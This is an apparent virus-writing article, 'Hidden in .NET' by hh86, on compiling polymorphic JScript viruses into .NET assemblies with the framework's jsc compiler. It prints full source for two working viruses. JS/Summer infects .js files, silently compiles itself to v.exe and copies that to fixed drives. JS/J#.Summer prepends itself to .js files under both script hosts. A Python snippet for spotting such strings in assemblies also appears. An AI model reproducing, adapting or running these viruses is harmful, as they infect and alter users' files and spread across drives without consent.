Hidden in .NET
by
hh86
.NET Compilers
Microsoft decided to include compilers with the .NET Framework, which is
available on pretty much every computer in the world running Windows. The
compilers include one for JScript .NET, so we can compile our JScript virus
source into a .NET assembly. Imagine you have a polymorphic JScript virus and
it is transformed to MSIL code: what is the result? One great .NET assembly that
looks very different from the previous one, so on each computer you can generate
multiple polymorphic or even more complex instances of the virus, running and
spreading as an exe file. This is a much more powerful technique than using
JS2EXE tools. ;) Since now you can infect files and recompile yourself!
How hidden?
The source code will be encoded as a UTF-16LE string (no BOM is present because
every string is stored in this format). The strings are stored in the MetaData
section. When running, it will use the VSA Engine to run our script. This looks
like an easy way to host and run the script; however, it gets as complex as the
source code is. One of the problems for me was making a JScript file infector:
how was I going to retrieve my source code? After some examination I found this,
and I knew reflection must be available. JScript always had its reflection
system (in part because of the Function() object, we can create a function to be
in a variable), so we don't need to open our own file and get the code, really.
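For a defender, the storage described above means that string literals compiled by jsc stay readable in the assembly's #US (user string) heap. The following is an added example, not part of the original article: a Python sketch that locates the #US stream, decodes its UTF-16LE entries, and reports those naming script host objects. The function names, the marker list, and the constructed sample blob are assumptions for illustration, and well-formed metadata is assumed.

```python
import struct

# Object names that appear in the page's script; extend for your own hunting.
MARKERS = ("Scripting.FileSystemObject", "WScript.Shell", "ActiveXObject")

def read_len(buf, pos):  # ECMA-335 compressed unsigned int -> (value, next pos)
    b = buf[pos]
    if b < 0x80:
        return b, pos + 1
    if b < 0xC0:
        return ((b & 0x3F) << 8) | buf[pos + 1], pos + 2
    return int.from_bytes(buf[pos:pos + 4], "big") & 0x1FFFFFFF, pos + 4

def us_heap(image):  # bytes of the #US stream, or b"" if none is found
    root = image.find(b"BSJB")  # metadata root signature (simplification: first match)
    if root < 0:
        return b""
    (vlen,) = struct.unpack_from("<I", image, root + 12)
    pos = root + 16 + vlen + 4  # skip padded version string, flags, stream count
    (count,) = struct.unpack_from("<H", image, pos - 2)
    for _ in range(count):
        off, size = struct.unpack_from("<II", image, pos)
        end = image.index(b"\0", pos + 8)
        name = image[pos + 8:end]
        pos += 8 + ((end - pos - 8 + 4) & ~3)  # name + NUL, padded to 4 bytes
        if name == b"#US":
            return image[root + off:root + off + size]
    return b""

def user_strings(heap):  # each entry: length prefix, UTF-16LE text, 1 flag byte
    pos, out = 0, []
    while pos < len(heap):
        n, pos = read_len(heap, pos)
        if n:
            out.append(heap[pos:pos + n - 1].decode("utf-16-le", "replace"))
        pos += n
    return out

def script_hits(image):  # #US strings that name a script host object
    return [s for s in user_strings(us_heap(image)) if any(m in s for m in MARKERS)]

def sample_image():  # constructed blob, not a real assembly: stub + root + one #US stream
    heap = b"\0"
    for s in ("v.js", "Scripting.FileSystemObject", "hello"):
        raw = s.encode("utf-16-le") + b"\0"
        heap += bytes([len(raw)]) + raw
    heap += b"\0" * (-len(heap) % 4)
    hdr = b"BSJB" + struct.pack("<HHII", 1, 1, 0, 12) + b"v4.0.30319\0\0" + struct.pack("<HH", 0, 1)
    return b"MZ" + b"\0" * 62 + hdr + struct.pack("<II", len(hdr) + 12, len(heap)) + b"#US\0" + heap
```

To triage a file, pass its raw bytes to script_hits(); a hit is a lead for review, since legitimate JScript .NET programs can reference the same objects.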
How we do it
We just need access to the .NET Framework directory "Microsoft.NET\Framework".
The detail here is that there will be multiple versions of the framework. I
chose to go with the last one, 4.0.
Here is my virus JS/Summer, *must* be single-line, run carefully: it spreads to
fixed drives if possible.
g();function g(){;f=new ActiveXObject("Scripting.FileSystemObject");n=f.GetSpecialFolder(0)+"\\Microsoft.NET\\Framework\\v4.0.30319\\";c="g();"+g;v="v=[]";for(i=0;i<c.length;i++){v=v+";v.push(\"\\x"+c.substr(i,1).charCodeAt(0).toString(16)+"\")"}v=v+c.substr(17,51)+"s=f.CreateTextFile(\"v.js\",2);v=v.join(\"\");s.Write(v);s.Close()";for(y=new Enumerator(f.getfolder(".").files);!y.atEnd();y.moveNext()){x=y.item();if(f.GetExtensionName(x).toLowerCase()=="js"){try{b=f.OpenTextFile(x);k=b.Read(4);if(k!=c.substr(0,4)){h=b.ReadAll();b.Close();p=x.Attributes;x.Attributes=0;l=f.CreateTextFile(x);l.Write(c+";"+k+h);l.Close();x.Attributes=p}}catch(e){}}}s=f.CreateTextFile(n+"v",2);s.Write(v);s.Close();w=new ActiveXObject("WScript.Shell").Run("cmd /k cd "+n+"&jsc /t:winexe /fast- v&exit",0,1);for(y=new Enumerator(f.Drives);!y.atEnd();y.moveNext()){u=y.item();if(u.DriveType==1){v="v.exe";f.CopyFile(n+v,u+"\\"+v)}}}
JS .NET virus
I thought to make an interesting cross-infector. However, we cannot know for
certain whether a file is JScript or JScript .NET. A known bug is that we cannot
include the "import System;import System.IO" we require for JScript .NET. :(
Here it is, though, JS/J#.Summer:
g();function g()
{
/*access source code in #US when in .NET assembly*/
var u="g();"+g+"\r\n";
try
{
s=GC //but it was a trick and the clock struck 12
}
catch(e)
{
var f=new ActiveXObject("Scripting.FileSystemObject");
for(y=new Enumerator(f.getfolder(".").files);!y.atEnd();y.moveNext())
{
var x=y.item();
if(f.GetExtensionName(x).toLowerCase()=="js")
{
try
{
var b=f.OpenTextFile(x);var h=b.ReadAll();b.Close();
if(h.substr(0,4)!="g();")
{
var p=x.Attributes;x.Attributes=0;var l=f.CreateTextFile(x);l.Write(u+h);l.Close();x.Attributes=p
}
}
catch(e)
{}
}
}
return
}
/*MSIL code now*/
var w,s=Object();
var y=Directory.GetFiles(Directory.GetCurrentDirectory(),"*.js");
for(var x in y)
{
x=y[x].ToString();
try
{
s=new StreamReader(x);var c=s.ReadToEnd();s.Close();
if(c.substr(0,4)!="g();")
{
var a=File.GetAttributes(x);File.SetAttributes(x,0);w=new StreamWriter(x);w.Write(u+c);w.Close();File.SetAttributes(x,a)
}
}
catch(e)
{}
}
}